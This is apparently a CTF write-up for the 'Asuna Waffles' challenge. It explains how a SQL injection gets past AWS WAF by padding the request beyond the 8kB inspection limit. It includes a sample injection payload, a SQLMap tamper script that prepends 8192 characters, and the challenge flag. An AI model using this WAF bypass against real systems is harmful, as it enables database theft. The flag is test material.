Asuna Waffles

I really love blue-berry waffles. I really do. Even Asuna loves it too! There are two users, flag is in one of the columns. http://asuna.nullsession.pw author: Gladiator

Going to the index page, we are told that this is yet another SQL injection challenge ™️

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2022 04:44:43 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 114
Connection: close
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Disposition
X-Request-Id: 3dfaa711-24bc-4755-b720-4b0fbfa16335

You can try using /search to search. Example: /search?q=bob ["SELECT * FROM user WHERE username = '"+username+"'"]

However, once we start fuzzing some classic SQLi payloads, we would quickly find that the challenge is not so simple. We are instead greeted with a 403 Forbidden page.

HTTP/1.1 403 Forbidden
Server: awselb/2.0
Date: Mon, 14 Mar 2022 04:45:55 GMT
Content-Type: text/html
Content-Length: 520
Connection: close

<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->

One would notice, however, that the Server header is now present. We know that the application is put behind an AWS ELB, so we could guess that the AWS WAF is the one blocking our SQLi requests.

Dangerous Defaults

Wait... this can't be... can it? Surely there must be some other default rule that says that anything longer than 8kB is blocked without even being passed to the WAF... right?

Well, a simple test showed otherwise. Even a trivial payload like aaa...[8kB]...aaa' or '1 would succeed. We could therefore dump the database using SQLi payloads longer than 8kB!

I was too lazy to do this manually, so I just wrote a simple SQLMap tamper script that prepends 8192 "a"s to the payload.

#!/usr/bin/env python
from lib.core.enums import PRIORITY
import re

__priority__ = PRIORITY.NORMAL
def dependencies():
    pass

def tamper(payload, **kwargs):
    return "a" * 8192 + payload

CTFSG{A_Cru3l_Summ3r_W1th_SAO_RELEASE_RECOLLECTION}

Is There a Mitigation?

PreviousCTF.SG CTF NextSenpai

Last updated 3 years ago

Was this helpful?

HTTP/1.1 200 OK Date: Mon, 14 Mar 2022 04:44:43 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 114 Connection: close Access-Control-Allow-Headers: * Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Disposition X-Request-Id: 3dfaa711-24bc-4755-b720-4b0fbfa16335 You can try using /search to search. Example: /search?q=bob ["SELECT * FROM user WHERE username = '"+username+"'"]

HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Mon, 14 Mar 2022 04:45:55 GMT Content-Type: text/html Content-Length: 520 Connection: close <html> <head><title>403 Forbidden</title></head> <body> <center><h1>403 Forbidden</h1></center> </body> </html>